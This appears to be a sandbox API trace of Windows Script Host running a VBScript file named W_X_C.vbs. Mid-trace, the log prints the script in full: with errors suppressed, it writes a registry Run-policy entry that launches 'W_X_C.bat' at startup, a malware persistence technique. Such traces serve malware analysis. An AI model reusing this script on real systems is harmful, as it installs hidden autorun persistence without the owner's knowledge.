lpReserved=0x0, lpType=0x3ee740, lpData=0x3ee744, lpcbData=0x3ee73c*=0x400 | out: lpType=0x3ee740*=0x0, lpData=0x3ee744*=0x2, lpcbData=0x3ee73c*=0x400) returned 0x2 [0141.281] RegQueryValueExW (in: hKey=0xa0, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x3ee740, lpData=0x3ee744, lpcbData=0x3ee73c*=0x400 | out: lpType=0x3ee740*=0x0, lpData=0x3ee744*=0x2, lpcbData=0x3ee73c*=0x400) returned 0x2 [0141.281] RegQueryValueExW (in: hKey=0xa4, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x3ee740, lpData=0x3ee744, lpcbData=0x3ee73c*=0x400 | out: lpType=0x3ee740*=0x0, lpData=0x3ee744*=0x2, lpcbData=0x3ee73c*=0x400) returned 0x2 [0141.281] RegCloseKey (hKey=0xa4) returned 0x0 [0141.282] RegCloseKey (hKey=0xa0) returned 0x0 [0141.282] GetACP () returned 0x4e4 [0141.282] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a80000 [0141.282] GetProcAddress (hModule=0x75a80000, lpProcName="HeapSetInformation") returned 0x75a95609 [0141.282] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.282] FreeLibrary (hLibModule=0x75a80000) returned 1 [0141.282] ??2@YAPAXI@Z () returned 0x131348 [0141.282] CoRegisterMessageFilter (in: lpMessageFilter=0x131348, lplpMessageFilter=0x131350 | out: lplpMessageFilter=0x131350*=0x0) returned 0x0 [0141.283] IUnknown:AddRef (This=0x131348) returned 0x2 [0141.283] GetModuleFileNameW (in: hModule=0x7f0000, lpFilename=0x3ef624, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f [0141.283] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x3ef038 | out: lpdwHandle=0x3ef038) returned 0x704 [0141.283] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x3ee920 | out: lpData=0x3ee920) returned 1 [0141.284] VerQueryValueW (in: pBlock=0x3ee920, lpSubBlock="\\", lplpBuffer=0x3ef034, puLen=0x3ef030 | out: lplpBuffer=0x3ef034*=0x3ee948, puLen=0x3ef030) returned 1 [0141.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef048 | out: phkResult=0x3ef048*=0xa0) returned 0x0 [0141.284] RegQueryValueExW (in: hKey=0xa0, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x3ee414, lpData=0x3ee418, lpcbData=0x3ee410*=0x400 | out: lpType=0x3ee414*=0x0, lpData=0x3ee418*=0xcd, lpcbData=0x3ee410*=0x400) returned 0x2 [0141.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ef044 | out: phkResult=0x3ef044*=0xa4) returned 0x0 [0141.285] RegQueryValueExW (in: hKey=0xa4, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x3ef00c, lpData=0x3ef040, lpcbData=0x3ef014*=0x4 | out: lpType=0x3ef00c*=0x0, lpData=0x3ef040*=0x59, lpcbData=0x3ef014*=0x4) returned 0x2 [0141.285] RegQueryValueExW (in: hKey=0xa4, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x3ee414, lpData=0x3ee418, lpcbData=0x3ee410*=0x400 | out: lpType=0x3ee414*=0x0, lpData=0x3ee418*=0xcd, lpcbData=0x3ee410*=0x400) returned 0x2 [0141.285] RegQueryValueExW (in: hKey=0xa0, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x3ef00c, lpData=0x3ef040, lpcbData=0x3ef014*=0x4 | out: lpType=0x3ef00c*=0x0, lpData=0x3ef040*=0x59, lpcbData=0x3ef014*=0x4) returned 0x2 [0141.285] RegQueryValueExW (in: hKey=0xa0, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x3ee414, lpData=0x3ee418, lpcbData=0x3ee410*=0x400 | out: lpType=0x3ee414*=0x1, lpData="1", lpcbData=0x3ee410*=0x4) returned 0x0 [0141.285] lstrlenW (lpString="1") returned 1 [0141.285] lstrlenW (lpString="0") returned 1 [0141.286] lstrlenW (lpString="1") returned 1 [0141.286] lstrlenW (lpString="no") returned 2 [0141.286] lstrlenW (lpString="1") returned 1 [0141.286] lstrlenW (lpString="false") returned 5 [0141.286] RegCloseKey (hKey=0xa4) returned 0x0 [0141.286] RegCloseKey (hKey=0xa0) returned 0x0 [0141.286] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x3ef054, lpdwDisposition=0x0 | out: phkResult=0x3ef054*=0xa0, lpdwDisposition=0x0) returned 0x0 [0141.287] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x3ef018, lpData=0x3ef048, lpcbData=0x3ef020*=0x4 | out: lpType=0x3ef018*=0x0, lpData=0x3ef048*=0x90, lpcbData=0x3ef020*=0x4) returned 0x2 [0141.287] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x3ee420, lpData=0x3ee424, lpcbData=0x3ee41c*=0x400 | out: lpType=0x3ee420*=0x1, lpData="1", lpcbData=0x3ee41c*=0x4) returned 0x0 [0141.287] lstrlenW (lpString="1") returned 1 [0141.287] lstrlenW (lpString="0") returned 1 [0141.287] lstrlenW (lpString="1") returned 1 [0141.287] lstrlenW (lpString="no") returned 2 [0141.287] lstrlenW (lpString="1") returned 1 [0141.287] lstrlenW (lpString="false") returned 5 [0141.287] RegCloseKey (hKey=0xa0) returned 0x0 [0141.287] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x3ef054, lpdwDisposition=0x0 | out: phkResult=0x3ef054*=0xa0, lpdwDisposition=0x0) returned 0x0 [0141.288] RegQueryValueExW (in: hKey=0xa0, lpValueName="Timeout", lpReserved=0x0, lpType=0x3ef018, lpData=0x3ef048, lpcbData=0x3ef020*=0x4 | out: lpType=0x3ef018*=0x0, lpData=0x3ef048*=0x90, lpcbData=0x3ef020*=0x4) returned 0x2 [0141.288] RegQueryValueExW (in: hKey=0xa0, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x3ee420, lpData=0x3ee424, lpcbData=0x3ee41c*=0x400 | out: lpType=0x3ee420*=0x0, lpData=0x3ee424*=0x31, lpcbData=0x3ee41c*=0x400) returned 0x2 [0141.288] RegCloseKey (hKey=0xa0) returned 0x0 [0141.288] lstrlenW (lpString="C:\\Windows\\W_X_C.vbs") returned 20 [0141.288] lstrlenW (lpString="vbs") returned 3 [0141.288] lstrlenW (lpString="WSH") returned 3 [0141.288] ??2@YAPAXI@Z () returned 0x131360 [0141.288] memcpy (in: _Dst=0x3eebd4, _Src=0x3ef624, _Size=0x26 | out: _Dst=0x3eebd4) returned 0x3eebd4 [0141.289] LoadStringW (in: hInstance=0x7f0000, uID=0x9c5, lpBuffer=0x3ed3a4, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0141.299] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x3eebcc*=0x0 | out: pptlib=0x3eebcc*=0xa2fd18) returned 0x0 [0141.317] ITypeLib:GetTypeInfoOfGuid (in: This=0xa2fd18, GUID=0x7f1acc*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x3eebb4 | out: ppTInfo=0x3eebb4*=0xa30e4c) returned 0x0 [0141.328] ITypeInfo:GetRefTypeOfImplType (in: This=0xa30e4c, index=0xffffffff, pRefType=0x3eeba8 | out: pRefType=0x3eeba8*=0xfffffffe) returned 0x0 [0141.328] ITypeInfo:GetRefTypeInfo (in: This=0xa30e4c, hreftype=0xfffffffe, ppTInfo=0x809060 | out: ppTInfo=0x809060*=0xa30e78) returned 0x0 [0141.328] IUnknown:Release (This=0xa30e4c) returned 0x1 [0141.328] ??2@YAPAXI@Z () returned 0x1313b0 [0141.328] ??2@YAPAXI@Z () returned 0x131408 [0141.329] ??2@YAPAXI@Z () returned 0x131440 [0141.329] ITypeLib:GetTypeInfoOfGuid (in: This=0xa2fd18, GUID=0x7f3c7c*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x3eeba4 | out: ppTInfo=0x3eeba4*=0xa30ea4) returned 0x0 [0141.329] ITypeInfo:GetRefTypeOfImplType (in: This=0xa30ea4, index=0xffffffff, pRefType=0x3eeb98 | out: pRefType=0x3eeb98*=0xfffffffe) returned 0x0 [0141.329] ITypeInfo:GetRefTypeInfo (in: This=0xa30ea4, hreftype=0xfffffffe, ppTInfo=0x8090a0 | out: ppTInfo=0x8090a0*=0xa30ed0) returned 0x0 [0141.330] IUnknown:Release (This=0xa30ea4) returned 0x1 [0141.330] ITypeLib:GetTypeInfoOfGuid (in: This=0xa2fd18, GUID=0x7f3c8c*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x3eeba4 | out: ppTInfo=0x3eeba4*=0xa30efc) returned 0x0 [0141.330] ITypeInfo:GetRefTypeOfImplType (in: This=0xa30efc, index=0xffffffff, pRefType=0x3eeb98 | out: pRefType=0x3eeb98*=0xfffffffe) returned 0x0 [0141.330] ITypeInfo:GetRefTypeInfo (in: This=0xa30efc, hreftype=0xfffffffe, ppTInfo=0x8090c0 | out: ppTInfo=0x8090c0*=0xa30f28) returned 0x0 [0141.330] IUnknown:Release (This=0xa30efc) returned 0x1 [0141.330] ITypeLib:GetTypeInfoOfGuid (in: This=0xa2fd18, GUID=0x7f1cac*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x3eeba4 | out: ppTInfo=0x3eeba4*=0xa30f54) returned 0x0 [0141.330] ITypeInfo:GetRefTypeOfImplType (in: This=0xa30f54, index=0xffffffff, pRefType=0x3eeb98 | out: pRefType=0x3eeb98*=0xfffffffe) returned 0x0 [0141.331] ITypeInfo:GetRefTypeInfo (in: This=0xa30f54, hreftype=0xfffffffe, ppTInfo=0x809080 | out: ppTInfo=0x809080*=0xa30f80) returned 0x0 [0141.331] IUnknown:Release (This=0xa30f54) returned 0x1 [0141.331] IUnknown:Release (This=0xa2fd18) returned 0x4 [0141.331] ??2@YAPAXI@Z () returned 0x132598 [0141.331] GetCurrentThreadId () returned 0xbcc [0141.331] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf0 [0141.331] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7f2f25, lpParameter=0x132598, dwCreationFlags=0x0, lpThreadId=0x1325ac | out: lpThreadId=0x1325ac*=0xb90) returned 0xf8 [0141.393] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x3eedcc*=0xf0, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0141.447] CloseHandle (hObject=0xf0) returned 1 [0141.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\W_X_C.vbs", nBufferLength=0x104, lpBuffer=0x3eee2c, lpFilePart=0x3eee18 | out: lpBuffer="C:\\Windows\\W_X_C.vbs", lpFilePart=0x3eee18*="W_X_C.vbs") returned 0x14 [0141.448] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ee3c0 | out: phkResult=0x3ee3c0*=0x10a) returned 0x0 [0141.449] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x3ee388, lpData=0x3ee3c4, lpcbData=0x3ee38c*=0x800 | out: lpType=0x3ee388*=0x1, lpData="VBSFile", lpcbData=0x3ee38c*=0x10) returned 0x0 [0141.449] RegCloseKey (hKey=0x10a) returned 0x0 [0141.449] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ee3c0 | out: phkResult=0x3ee3c0*=0x10a) returned 0x0 [0141.449] RegQueryValueExW (in: hKey=0x10a, lpValueName=0x0, lpReserved=0x0, lpType=0x3ee388, lpData=0x3eebfc, lpcbData=0x3ee38c*=0x200 | out: lpType=0x3ee388*=0x1, lpData="VBScript", lpcbData=0x3ee38c*=0x12) returned 0x0 [0141.450] RegCloseKey (hKey=0x10a) returned 0x0 [0141.450] ??2@YAPAXI@Z () returned 0x132868 [0141.450] GetProcessHeap () returned 0xa10000 [0141.450] RtlAllocateHeap (HeapHandle=0xa10000, Flags=0x0, Size=0x2000) returned 0xa355e8 [0141.450] CLSIDFromString (in: lpsz="VBScript", pclsid=0x3eebcc | out: pclsid=0x3eebcc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0141.451] CoCreateInstance (in: rclsid=0x3eebcc*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7f1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3eebc8 | out: ppv=0x3eebc8*=0x132a18) returned 0x0 [0141.932] malloc (_Size=0x80) returned 0x132950 [0141.932] __dllonexit () returned 0x72c27164 [0141.933] __dllonexit () returned 0x72c2717e [0141.933] __dllonexit () returned 0x72c27198 [0141.933] GetUserDefaultLCID () returned 0x409 [0141.933] GetVersion () returned 0x1db10106 [0141.934] DllGetClassObject (in: rclsid=0xa38e24*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x76caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3edeb4 | out: ppv=0x3edeb4*=0x1329d8) returned 0x0 [0142.020] ??2@YAPAXI@Z () returned 0x1329d8 [0142.021] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x1329d8, pUnkOuter=0x0, riid=0x3ee860*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3edea0 | out: ppvObject=0x3edea0*=0x132a18) returned 0x0 [0142.021] ??2@YAPAXI@Z () returned 0x132a18 [0142.021] GetUserDefaultLCID () returned 0x409 [0142.021] GetACP () returned 0x4e4 [0142.021] VBScriptEngine5:IUnknown:AddRef (This=0x132a18) returned 0x2 [0142.021] VBScriptEngine5:IUnknown:Release (This=0x132a18) returned 0x1 [0142.022] VBScriptEngine5:IUnknown:Release (This=0x1329d8) returned 0x0 [0142.022] ??3@YAXPAX@Z () returned 0x1 [0142.022] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x132a18, riid=0x7f1aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3eeb90 | out: ppvObject=0x3eeb90*=0x132a18) returned 0x0 [0142.022] VBScriptEngine5:IUnknown:Release (This=0x132a18) returned 0x1 [0142.022] GetCurrentThreadId () returned 0xbcc [0142.022] ??2@YAPAXI@Z () returned 0x132c20 [0142.022] GetCurrentThreadId () returned 0xbcc [0142.023] ??2@YAPAXI@Z () returned 0x1329d8 [0142.023] ??2@YAPAXI@Z () returned 0x132ce0 [0142.023] ??2@YAPAXI@Z () returned 0x132d08 [0142.023] ??2@YAPAXI@Z () returned 0x132d88 [0142.023] GetCurrentThreadId () returned 0xbcc [0142.023] ??2@YAPAXI@Z () returned 0x132db0 [0142.024] GetUserDefaultLCID () returned 0x409 [0142.024] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0142.024] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x3eeb80, cchData=6 | out: lpLCData="1252") returned 5 [0142.025] IsValidCodePage (CodePage=0x4e4) returned 1 [0142.025] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76c60000 [0142.025] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstance") returned 0x76ca9d0b [0142.025] CoCreateInstance (in: rclsid=0x72c1b234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x72c1b244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x132bf4 | out: ppv=0x132bf4*=0xa295c8) returned 0x0 [0142.026] IUnknown:AddRef (This=0xa295c8) returned 0x2 [0142.026] GetCurrentProcessId () returned 0xb6c [0142.026] GetCurrentThreadId () returned 0xbcc [0142.026] GetTickCount () returned 0x1d0c654 [0142.026] ISystemDebugEventFire:BeginSession (This=0xa295c8, guidSourceID=0x72c1b308, strSessionName="VBScript:00002924:00003020:30459476") returned 0x0 [0142.026] GetCurrentThreadId () returned 0xbcc [0142.026] ??2@YAPAXI@Z () returned 0x132e00 [0142.027] ??2@YAPAXI@Z () returned 0x132e30 [0142.027] malloc (_Size=0x40) returned 0x132ec0 [0142.027] malloc (_Size=0x104) returned 0x132f08 [0142.027] memcpy (in: _Dst=0x132f3c, _Src=0xa34fc4, _Size=0x10 | out: _Dst=0x132f3c) returned 0x132f3c [0142.027] GetCurrentThreadId () returned 0xbcc [0142.028] ??2@YAPAXI@Z () returned 0x133018 [0142.028] memcpy (in: _Dst=0x132f7c, _Src=0xa2dad4, _Size=0x8 | out: _Dst=0x132f7c) returned 0x132f7c [0142.028] CreateFileW (lpFileName="C:\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x124 [0142.028] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5 [0142.028] CreateFileMappingA (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc5, lpName=0x0) returned 0x128 [0142.028] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5c0000 [0142.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="on error resume next\r\ndim t\r\nset t = CreateObject(\"WScript.Shell\")\r\nt.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"\r\n", cbMultiByte=197, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 197 [0142.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="on error resume next\r\ndim t\r\nset t = CreateObject(\"WScript.Shell\")\r\nt.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"\r\n", cbMultiByte=197, lpWideCharStr=0xa39c74, cchWideChar=197 | out: lpWideCharStr="on error resume next\r\ndim t\r\nset t = CreateObject(\"WScript.Shell\")\r\nt.regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\Q9IATRKPRH\",\"W_X_C.bat\",\"REG_SZ\"\r\n") returned 197 [0142.029] UnmapViewOfFile (lpBaseAddress=0x5c0000) returned 1 [0142.029] CloseHandle (hObject=0x128) returned 1 [0142.029] CloseHandle (hObject=0x124) returned 1 [0142.029] GetSystemDirectoryA (in: lpBuffer=0x3eed4b, uSize=0x0 | out: lpBuffer="") returned 0x14 [0142.029] ??2@YAPAXI@Z () returned 0x133048 [0142.029] GetSystemDirectoryA (in: lpBuffer=0x133048, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0142.030] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x76f40000 [0142.070] ??3@YAXPAX@Z () returned 0x1 [0142.070] GetProcAddress (hModule=0x76f40000, lpProcName="SaferIdentifyLevel") returned 0x76f62102 [0142.070] GetProcAddress (hModule=0x76f40000, lpProcName="SaferComputeTokenFromLevel") returned 0x76f63352 [0142.071] GetProcAddress (hModule=0x76f40000, lpProcName="SaferCloseLevel") returned 0x76f63825 [0142.072] IdentifyCodeAuthzLevelW () returned 0x1 [0142.673] malloc (_Size=0x80) returned 0x133598 [0142.674] GetVersionExA (in: lpVersionInformation=0x3ee3d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77a8e026, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3ee3d4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0142.674] GetUserDefaultLCID () returned 0x409 [0142.676] IsFileSupportedName () returned 0x1 [0142.676] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0142.686] GetSignedDataMsg () returned 0x0 [0142.686] GetCurrentProcess () returned 0xffffffff [0142.686] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3ee900, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3ee900*=0x154) returned 1 [0142.686] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc5 [0142.686] ??2@YAPAXI@Z () returned 0x13e0a8 [0142.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.686] ReadFile (in: hFile=0x154, lpBuffer=0x13e0a8, nNumberOfBytesToRead=0xc5, lpNumberOfBytesRead=0x3ee8d4, lpOverlapped=0x0 | out: lpBuffer=0x13e0a8*, lpNumberOfBytesRead=0x3ee8d4*=0xc5, lpOverlapped=0x0) returned 1 [0142.686] CoInitialize (pvReserved=0x0) returned 0x1 [0142.686] CoCreateInstance (in: rclsid=0x753d1e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x753d1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x3ee8ac | out: ppv=0x3ee8ac*=0x13e4d8) returned 0x0 [0143.162] malloc (_Size=0x80) returned 0x13e178 [0143.162] __dllonexit () returned 0x72941815 [0143.163] __dllonexit () returned 0x7294182f [0143.163] GetVersionExA (in: lpVersionInformation=0x3ed438*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x3ed428, dwMinorVersion=0x2, dwBuildNumber=0x3f0000, dwPlatformId=0x72944268, szCSDVersion="XÔ>") | out: lpVersionInformation=0x3ed438*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0143.163] GetProcessWindowStation () returned 0x4c [0143.163] GetUserObjectInformationA (in: hObj=0x4c, nIndex=1, pvInfo=0x3ed428, nLength=0xc, lpnLengthNeeded=0x3ed434 | out: pvInfo=0x3ed428, lpnLengthNeeded=0x3ed434) returned 1 [0143.163] ??2@YAPAXI@Z () returned 0x13e200 [0143.163] ??2@YAPAXI@Z () returned 0x1329f8 [0143.164] ??2@YAPAXI@Z () returned 0x13e238 [0143.164] ??2@YAPAXI@Z () returned 0x13e268 [0143.164] ??2@YAPAXI@Z () returned 0x13e298 [0143.164] ??2@YAPAXI@Z () returned 0x13e2c8 [0143.164] ??2@YAPAXI@Z () returned 0x13e2f8 [0143.164] ??2@YAPAXI@Z () returned 0x13e328 [0143.164] ??2@YAPAXI@Z () returned 0x13e358 [0143.164] ??2@YAPAXI@Z () returned 0x13e388 [0143.164] ??2@YAPAXI@Z () returned 0x13e3b8 [0143.164] ??3@YAXPAX@Z () returned 0x1 [0143.164] ??2@YAPAXI@Z () returned 0x13e3e0 [0143.164] ??2@YAPAXI@Z () returned 0x13e410 [0143.165] DllGetClassObject (in: rclsid=0xa38e58*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x76caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3edba4 | out: ppv=0x3edba4*=0x1329f8) returned 0x0 [0143.165] ??2@YAPAXI@Z () returned 0x1329f8 [0143.165] IClassFactory:CreateInstance (in: This=0x1329f8, pUnkOuter=0x0, riid=0x3ee550*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x3edb90 | out: ppvObject=0x3edb90*=0x13e4d8) returned 0x0 [0143.165] ??2@YAPAXI@Z () returned 0x13e440 [0143.165] GetSystemInfo (in: lpSystemInfo=0x3edad0 | out: lpSystemInfo=0x3edad0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0143.165] VirtualQuery (in: lpAddress=0x3edb10, lpBuffer=0x3edaf4, dwLength=0x1c | out: lpBuffer=0x3edaf4*(BaseAddress=0x3ed000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.165] ??2@YAPAXI@Z () returned 0x13e468 [0143.166] ??2@YAPAXI@Z () returned 0x13e478 [0143.166] ??2@YAPAXI@Z () returned 0x13e4b0 [0143.166] ??2@YAPAXI@Z () returned 0x13e4c8 [0143.166] ??2@YAPAXI@Z () returned 0x13e520 [0143.166] IUnknown:AddRef (This=0x13e4d8) returned 0x2 [0143.166] IUnknown:Release (This=0x13e4d8) returned 0x1 [0143.166] IUnknown:Release (This=0x1329f8) returned 0x0 [0143.166] ??3@YAXPAX@Z () returned 0x1 [0143.166] IUnknown:QueryInterface (in: This=0x13e4d8, riid=0x753d1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x3ee87c | out: ppvObject=0x3ee87c*=0x13e4d8) returned 